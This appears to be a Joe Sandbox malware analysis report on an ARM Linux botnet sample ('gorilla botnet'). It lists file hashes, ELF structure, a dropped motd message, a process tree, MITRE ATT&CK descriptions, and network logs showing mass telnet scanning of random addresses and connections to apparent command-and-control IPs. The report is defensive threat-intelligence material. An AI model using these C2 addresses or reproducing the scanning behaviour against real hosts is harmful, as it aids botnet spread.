15.157.206.185	unknown	United States	71	HP-INTERNET-ASUS	false
155.190.105.235	unknown	Netherlands	20437	AS20437US	false
164.35.51.211	unknown	Belgium	29355	KCELL-ASKZ	false
40.222.127.195	unknown	United States	4249	LILLY-ASUS	false
40.1.165.90	unknown	United States	4249	LILLY-ASUS	false
153.122.122.184	unknown	Japan	131921	GMOCLGMOCLOUDKKJP	false
61.14.205.143	unknown	India	17970	SKYBB-AS-APSKYBroadbandSKYCableCorporationPH	false
207.67.91.54	unknown	United States	30560	GE-MS001US	false
103.143.208.58	unknown	Viet Nam	56150	VHOST-AS-VNVietSolutionsServicesTradingCompanyLimited	false
105.158.78.210	unknown	Morocco	36903	MT-MPLSMA	false
128.66.90.39	unknown	Italy	24608	WINDTRE-ASIT	false
181.183.175.74	unknown	Venezuela	6306	TELEFONICAVENEZOLANACAVE	false
113.13.84.34	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
111.206.47.61	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
148.250.47.5	unknown	Mexico	6503	AxtelSABdeCVMX	false
183.169.48.230	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
220.109.229.200	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
114.74.255.223	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	false
97.67.71.162	unknown	United States	7029	WINDSTREAMUS	false
123.41.174.130	unknown	Korea Republic of	6619	SAMSUNGSDS-AS-KRSamsungSDSIncKR	false
159.156.48.202	unknown	Switzerland	34578	BEDAGCH	false
112.32.29.51	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
120.196.43.25	unknown	China	56040	CMNET-GUANGDONG-APChinaMobilecommunicationscorporation	false
39.241.4.20	unknown	Indonesia	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
79.34.169.131	unknown	Italy	3269	ASN-IBSNAZIT	false
106.108.224.219	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
94.27.2.107	unknown	Ukraine	12530	GOLDENTELECOM-UKRAINEKyivstarPJSCUA	false
33.71.230.164	unknown	United States	2686	ATGS-MMD-ASUS	false
22.4.220.86	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
218.118.11.201	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
210.168.244.162	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
60.216.14.26	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
163.27.95.84	unknown	Taiwan; Republic of China (ROC)	1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	false
173.135.10.184	unknown	United States	10507	SPCSUS	false
37.44.196.174	unknown	Russian Federation	48430	FIRSTDC-ASRU	false
14.177.224.114	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
95.131.78.148	unknown	Russian Federation	41148	ZOLOTAYALINIA-ASRU	false
18.40.70.108	unknown	United States	3	MIT-GATEWAYSUS	false
151.17.74.40	unknown	Italy	1267	ASN-WINDTREIUNETEU	false
83.195.166.18	unknown	France	3215	FranceTelecom-OrangeFR	false
204.208.17.206	unknown	United States	5972	DNIC-ASBLK-05800-06055US	false
155.31.220.224	unknown	United States	11809	NET-ERAU-PRCUS	false
91.162.44.227	unknown	France	12322	PROXADFR	false
26.69.120.206	unknown	United States	7922	COMCAST-7922US	false
131.29.217.221	unknown	United States	385	AFCONC-BLOCK1-ASUS	false
148.133.136.251	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
17.192.105.73	unknown	United States	714	APPLE-ENGINEERINGUS	false
217.36.158.157	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
138.222.188.250	unknown	Switzerland	10497	WORLDBANKUS	false
17.157.67.104	unknown	United States	714	APPLE-ENGINEERINGUS	false
109.154.252.158	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
140.167.74.158	unknown	Canada	56736	VASTRAGOTALANDSREGIONENSE	false
55.106.253.168	unknown	United States	361	DNIC-ASBLK-00306-00371US	false
87.149.9.130	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
140.183.143.218	unknown	United States	1503	DNIC-AS-01503US	false
16.207.88.180	unknown	United States	unknown	unknown	false
204.51.124.162	unknown	United States	11303	DATARETURNUS	false
212.90.254.134	unknown	Czech Republic	6740	TISCALICZ	false
114.97.146.113	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
56.58.95.82	unknown	United States	2686	ATGS-MMD-ASUS	false
135.145.118.150	unknown	United States	14962	NCR-252US	false
156.183.7.142	unknown	Egypt	36992	ETISALAT-MISREG	false
66.182.204.117	unknown	United States	20135	MTL-19US	false
214.93.142.185	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
162.175.43.176	unknown	United States	21928	T-MOBILE-AS21928US	false
48.55.16.11	unknown	United States	2686	ATGS-MMD-ASUS	false
59.63.145.177	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
220.123.218.34	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
87.42.38.223	unknown	Ireland	1213	HEANETIE	false
173.46.131.236	unknown	United States	29748	QTS-ASHUS	false
82.231.152.180	unknown	France	12322	PROXADFR	false
93.246.187.209	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
50.21.101.99	unknown	United States	17184	ATL-CBEYONDUS	false
60.220.10.238	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
200.79.141.155	unknown	Mexico	8151	UninetSAdeCVMX	false
49.68.231.143	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
119.70.200.0	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
97.221.104.163	unknown	United States	6167	CELLCO-PARTUS	false
141.61.24.32	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
34.65.20.112	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
145.51.240.33	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
184.183.159.148	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
158.97.33.46	unknown	Mexico	3640	CICESEMX	false
110.162.74.168	unknown	Japan	9605	DOCOMONTTDOCOMOINCJP	false
134.179.57.223	unknown	United States	26854	NYSUS	false
103.164.226.56	unknown	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
74.19.59.248	unknown	United States	7922	COMCAST-7922US	false
32.224.145.220	unknown	United States	2686	ATGS-MMD-ASUS	false
152.22.206.134	unknown	United States	17031	WINSTON-SALEM-SCHOOLSUS	false
156.226.203.160	unknown	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	false
135.254.221.60	unknown	United States	10455	LUCENT-CIOUS	false
56.3.220.202	unknown	United States	2686	ATGS-MMD-ASUS	false
66.98.194.87	unknown	United States	36351	SOFTLAYERUS	false
136.148.214.22	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	false
35.105.190.38	unknown	United States	237	MERIT-AS-14US	false
49.226.56.203	unknown	New Zealand	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
222.61.248.29	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
80.31.14.153	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
200.80.229.78	unknown	Argentina	27754	CooperativaBatandeObrasyServPublicosLtdaAR	false
41.132.12.178	unknown	South Africa	10474	OPTINETZA	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/motd

Download File

Process:	/tmp/arm5.nn-20241218-0633.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/tmp/qemu-open.Lb1GCE (deleted)

Download File

Process:	/tmp/arm5.nn-20241218-0633.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.284683810317086
Encrypted:	false
SSDEEP:	3:TggLLpXDTRw5n:TggRDc
MD5:	DAB32AEA04BC49FF536379446D91287E
SHA1:	033344519DA9F086D1E6960700819D4E69E00D6A
SHA-256:	AD059E1FEA384D3641BA11C55B46C9D141BD544D61B142DCE719E598D1DBCADE
SHA-512:	2250AFC1CB1F7A8DD3F0A2BBC97473502A2EA253CB8B4531389448CF5B3B10DCD878B1D194AA084CAE7F4D5643455299593713FAFDE104675E430C64851DCFB1
Malicious:	false
Reputation:	low
Preview:	/tmp/arm5.nn-20241218-0633.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.222049438520164
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm5.nn-20241218-0633.elf
File size:	104'828 bytes
MD5:	22ad871042ce032b7225a4f11f1d3f86
SHA1:	f68d2d02fb6df23061174bd38324d8895a73ddbe
SHA256:	1daa64d77d6383023899ac2eeeb00fe93ed821cdfcf01bf829c3ed5fe2e20bf5
SHA512:	37998c63f92a2e0232f87a043c28bd631ef1d109ee3f1b4ad3a8ebf9c2eeafbc336ea16df3a9e9751ca8ef232aa9da6670901333b76a0b70b184dc828cd74493
SSDEEP:	3072:FLhmGTolcPLLem7y4CxUOvlwh432nnUo:FLhmGScjLem7rCxUOdcv
TLSH:	76A34C52F9819A22C5D566BBF66E02CC376613F8D2EF3207CD15AF24378682B0D7B641
File Content Preview:	.ELF...a..........(.........4...........4. ...(..........................................................(..........Q.td..................................-...L."...UX..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x2
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	104428
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x1618c	0x0	0x6	AX	16
.fini	PROGBITS	0x1e23c	0x1623c	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1e250	0x16250	0x2f88	0x0	0x2	A	4
.ctors	PROGBITS	0x291dc	0x191dc	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x291e4	0x191e4	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x291f0	0x191f0	0x5bc	0x0	0x3	WA	4
.bss	NOBITS	0x297ac	0x197ac	0x2240	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x197ac	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x191d8	0x191d8	6.2340	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x191dc	0x291dc	0x291dc	0x5d0	0x2810	4.7697	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 07:37:18.803400040 CET	43928	443	192.168.2.23	91.189.91.42
Dec 18, 2024 07:37:19.851339102 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 18, 2024 07:37:19.851593971 CET	59192	23	192.168.2.23	35.66.122.149
Dec 18, 2024 07:37:19.860131025 CET	40020	23	192.168.2.23	99.150.118.215
Dec 18, 2024 07:37:19.887327909 CET	38540	23	192.168.2.23	86.127.229.186
Dec 18, 2024 07:37:19.903367996 CET	39618	23	192.168.2.23	3.40.78.144
Dec 18, 2024 07:37:19.910790920 CET	55038	23	192.168.2.23	189.56.160.159
Dec 18, 2024 07:37:19.914609909 CET	41480	23	192.168.2.23	105.160.132.68
Dec 18, 2024 07:37:19.919461012 CET	55992	23	192.168.2.23	2.169.136.131
Dec 18, 2024 07:37:19.924211979 CET	59386	23	192.168.2.23	193.10.203.102
Dec 18, 2024 07:37:19.929884911 CET	38918	23	192.168.2.23	147.52.149.113
Dec 18, 2024 07:37:19.932405949 CET	58740	23	192.168.2.23	61.225.6.238
Dec 18, 2024 07:37:19.935616970 CET	60764	23	192.168.2.23	83.46.38.208
Dec 18, 2024 07:37:19.936068058 CET	38984	199	192.168.2.23	154.216.19.139
Dec 18, 2024 07:37:19.938184977 CET	33044	23	192.168.2.23	47.32.224.73
Dec 18, 2024 07:37:19.940228939 CET	39736	23	192.168.2.23	151.160.49.197
Dec 18, 2024 07:37:19.941879034 CET	33524	23	192.168.2.23	62.248.23.59
Dec 18, 2024 07:37:19.943849087 CET	52320	23	192.168.2.23	109.226.127.100
Dec 18, 2024 07:37:19.945471048 CET	41750	23	192.168.2.23	112.209.69.234
Dec 18, 2024 07:37:19.947484016 CET	58506	23	192.168.2.23	50.30.76.172
Dec 18, 2024 07:37:19.949208021 CET	57400	23	192.168.2.23	53.223.207.183
Dec 18, 2024 07:37:19.951118946 CET	47650	23	192.168.2.23	211.61.85.120
Dec 18, 2024 07:37:19.952810049 CET	50670	23	192.168.2.23	189.230.121.152
Dec 18, 2024 07:37:19.954796076 CET	44550	23	192.168.2.23	56.203.8.134
Dec 18, 2024 07:37:19.956490040 CET	51524	23	192.168.2.23	203.16.172.246
Dec 18, 2024 07:37:19.958698988 CET	46174	23	192.168.2.23	68.63.161.215
Dec 18, 2024 07:37:19.960454941 CET	59072	23	192.168.2.23	155.181.154.10
Dec 18, 2024 07:37:19.962429047 CET	50670	23	192.168.2.23	133.73.42.97
Dec 18, 2024 07:37:19.964015007 CET	38820	23	192.168.2.23	1.191.54.203
Dec 18, 2024 07:37:19.965328932 CET	35752	23	192.168.2.23	5.79.150.34
Dec 18, 2024 07:37:19.966470957 CET	41918	23	192.168.2.23	93.32.85.212
Dec 18, 2024 07:37:19.967741013 CET	37610	23	192.168.2.23	2.210.129.107
Dec 18, 2024 07:37:19.968322992 CET	47644	23	192.168.2.23	40.87.83.172
Dec 18, 2024 07:37:19.968862057 CET	47466	23	192.168.2.23	215.184.182.92
Dec 18, 2024 07:37:19.970976114 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 18, 2024 07:37:19.971035957 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 18, 2024 07:37:19.971044064 CET	23	59192	35.66.122.149	192.168.2.23
Dec 18, 2024 07:37:19.971101999 CET	59192	23	192.168.2.23	35.66.122.149
Dec 18, 2024 07:37:19.971350908 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 18, 2024 07:37:19.972383976 CET	42284	23	192.168.2.23	53.63.103.104
Dec 18, 2024 07:37:19.973620892 CET	47874	23	192.168.2.23	2.214.26.236
Dec 18, 2024 07:37:19.974790096 CET	54692	23	192.168.2.23	172.184.53.11
Dec 18, 2024 07:37:19.976743937 CET	48914	23	192.168.2.23	6.109.155.200
Dec 18, 2024 07:37:19.977965117 CET	56828	23	192.168.2.23	190.89.149.23
Dec 18, 2024 07:37:19.979106903 CET	48498	23	192.168.2.23	119.108.24.247
Dec 18, 2024 07:37:19.979880095 CET	23	40020	99.150.118.215	192.168.2.23
Dec 18, 2024 07:37:19.979934931 CET	40020	23	192.168.2.23	99.150.118.215
Dec 18, 2024 07:37:19.980935097 CET	57736	23	192.168.2.23	135.212.53.41
Dec 18, 2024 07:37:19.982145071 CET	43938	23	192.168.2.23	34.219.206.237
Dec 18, 2024 07:37:19.983975887 CET	45588	23	192.168.2.23	50.36.117.21
Dec 18, 2024 07:37:19.984925985 CET	59134	23	192.168.2.23	186.75.203.110
Dec 18, 2024 07:37:19.986010075 CET	52962	23	192.168.2.23	204.184.19.14
Dec 18, 2024 07:37:19.987137079 CET	36866	23	192.168.2.23	143.91.117.105
Dec 18, 2024 07:37:19.988240957 CET	39314	23	192.168.2.23	159.129.114.210
Dec 18, 2024 07:37:19.989326954 CET	33074	23	192.168.2.23	182.83.41.0
Dec 18, 2024 07:37:19.990405083 CET	55940	23	192.168.2.23	174.30.181.115
Dec 18, 2024 07:37:19.991527081 CET	51278	23	192.168.2.23	185.152.217.4
Dec 18, 2024 07:37:19.992635965 CET	50352	23	192.168.2.23	18.219.77.68
Dec 18, 2024 07:37:19.993618965 CET	45634	23	192.168.2.23	150.27.213.51
Dec 18, 2024 07:37:19.996078014 CET	34580	23	192.168.2.23	88.107.249.101
Dec 18, 2024 07:37:19.998825073 CET	60820	23	192.168.2.23	18.128.141.141
Dec 18, 2024 07:37:20.001640081 CET	57352	23	192.168.2.23	148.108.233.75
Dec 18, 2024 07:37:20.004820108 CET	37546	23	192.168.2.23	21.4.33.54
Dec 18, 2024 07:37:20.007666111 CET	58500	23	192.168.2.23	212.170.151.183
Dec 18, 2024 07:37:20.007914066 CET	23	38540	86.127.229.186	192.168.2.23
Dec 18, 2024 07:37:20.007966042 CET	38540	23	192.168.2.23	86.127.229.186
Dec 18, 2024 07:37:20.010746002 CET	34304	23	192.168.2.23	113.141.233.109
Dec 18, 2024 07:37:20.013891935 CET	60954	23	192.168.2.23	137.184.72.137
Dec 18, 2024 07:37:20.016669035 CET	56238	23	192.168.2.23	36.110.18.149
Dec 18, 2024 07:37:20.018296957 CET	35184	23	192.168.2.23	61.248.13.76
Dec 18, 2024 07:37:20.020225048 CET	39382	23	192.168.2.23	184.255.84.85
Dec 18, 2024 07:37:20.022310019 CET	37414	23	192.168.2.23	159.138.181.136
Dec 18, 2024 07:37:20.022903919 CET	23	39618	3.40.78.144	192.168.2.23
Dec 18, 2024 07:37:20.022948027 CET	39618	23	192.168.2.23	3.40.78.144
Dec 18, 2024 07:37:20.024312019 CET	51792	23	192.168.2.23	89.234.23.43
Dec 18, 2024 07:37:20.026118994 CET	40708	23	192.168.2.23	11.98.143.202
Dec 18, 2024 07:37:20.027347088 CET	58754	23	192.168.2.23	83.195.166.18
Dec 18, 2024 07:37:20.030610085 CET	23	55038	189.56.160.159	192.168.2.23
Dec 18, 2024 07:37:20.030689001 CET	55038	23	192.168.2.23	189.56.160.159
Dec 18, 2024 07:37:20.034285069 CET	23	41480	105.160.132.68	192.168.2.23
Dec 18, 2024 07:37:20.034334898 CET	41480	23	192.168.2.23	105.160.132.68
Dec 18, 2024 07:37:20.039252996 CET	23	55992	2.169.136.131	192.168.2.23
Dec 18, 2024 07:37:20.039335012 CET	55992	23	192.168.2.23	2.169.136.131
Dec 18, 2024 07:37:20.043909073 CET	23	59386	193.10.203.102	192.168.2.23
Dec 18, 2024 07:37:20.043972969 CET	59386	23	192.168.2.23	193.10.203.102
Dec 18, 2024 07:37:20.047672987 CET	36982	23	192.168.2.23	111.39.217.88
Dec 18, 2024 07:37:20.049101114 CET	36094	23	192.168.2.23	88.103.247.124
Dec 18, 2024 07:37:20.049807072 CET	23	38918	147.52.149.113	192.168.2.23
Dec 18, 2024 07:37:20.049864054 CET	38918	23	192.168.2.23	147.52.149.113
Dec 18, 2024 07:37:20.050559998 CET	60772	23	192.168.2.23	84.43.220.11
Dec 18, 2024 07:37:20.052026033 CET	23	58740	61.225.6.238	192.168.2.23
Dec 18, 2024 07:37:20.052071095 CET	58740	23	192.168.2.23	61.225.6.238
Dec 18, 2024 07:37:20.052783966 CET	51832	23	192.168.2.23	68.230.89.223
Dec 18, 2024 07:37:20.054239988 CET	57438	23	192.168.2.23	140.183.143.218
Dec 18, 2024 07:37:20.055263042 CET	41614	23	192.168.2.23	45.167.93.222
Dec 18, 2024 07:37:20.055264950 CET	23	60764	83.46.38.208	192.168.2.23
Dec 18, 2024 07:37:20.055330038 CET	60764	23	192.168.2.23	83.46.38.208
Dec 18, 2024 07:37:20.055553913 CET	199	38984	154.216.19.139	192.168.2.23
Dec 18, 2024 07:37:20.055589914 CET	38984	199	192.168.2.23	154.216.19.139
Dec 18, 2024 07:37:20.057809114 CET	23	33044	47.32.224.73	192.168.2.23

System Behavior

Analysis Process: dash PID: 6195, Parent PID: 4334

General

Start time (UTC):	06:37:11
Start date (UTC):	18/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 6195, Parent PID: 4334

General

Start time (UTC):	06:37:11
Start date (UTC):	18/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Analysis Process: dash PID: 6196, Parent PID: 4334

General

Start time (UTC):	06:37:11
Start date (UTC):	18/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 6196, Parent PID: 4334

General

Start time (UTC):	06:37:11
Start date (UTC):	18/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.2Vk4GHUvv3 /tmp/tmp.AyMCUiGuNP /tmp/tmp.0eZyUHHcgu
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Analysis Process: arm5.nn-20241218-0633.elf PID: 6208, Parent PID: 6121

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/tmp/arm5.nn-20241218-0633.elf
Arguments:	/tmp/arm5.nn-20241218-0633.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: arm5.nn-20241218-0633.elf PID: 6233, Parent PID: 6208

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/tmp/arm5.nn-20241218-0633.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: arm5.nn-20241218-0633.elf PID: 6235, Parent PID: 6233

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/tmp/arm5.nn-20241218-0633.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: arm5.nn-20241218-0633.elf PID: 6236, Parent PID: 6233

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/tmp/arm5.nn-20241218-0633.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: arm5.nn-20241218-0633.elf PID: 6238, Parent PID: 6233

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/tmp/arm5.nn-20241218-0633.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: udisksd PID: 6219, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 6219, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 6298, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 6298, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 6299, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 6299, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: gnome-session-binary PID: 6331, Parent PID: 1477

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Analysis Process: sh PID: 6331, Parent PID: 1477

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gsd-housekeeping PID: 6331, Parent PID: 1477

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/libexec/gsd-housekeeping
Arguments:	/usr/libexec/gsd-housekeeping
File size:	51840 bytes
MD5 hash:	b55f3394a84976ddb92a2915e5d76914

Analysis Process: udisksd PID: 6332, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 6332, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Analysis Process: udisksd PID: 6336, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Analysis Process: dumpe2fs PID: 6336, Parent PID: 799

General

Start time (UTC):	06:37:19
Start date (UTC):	18/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

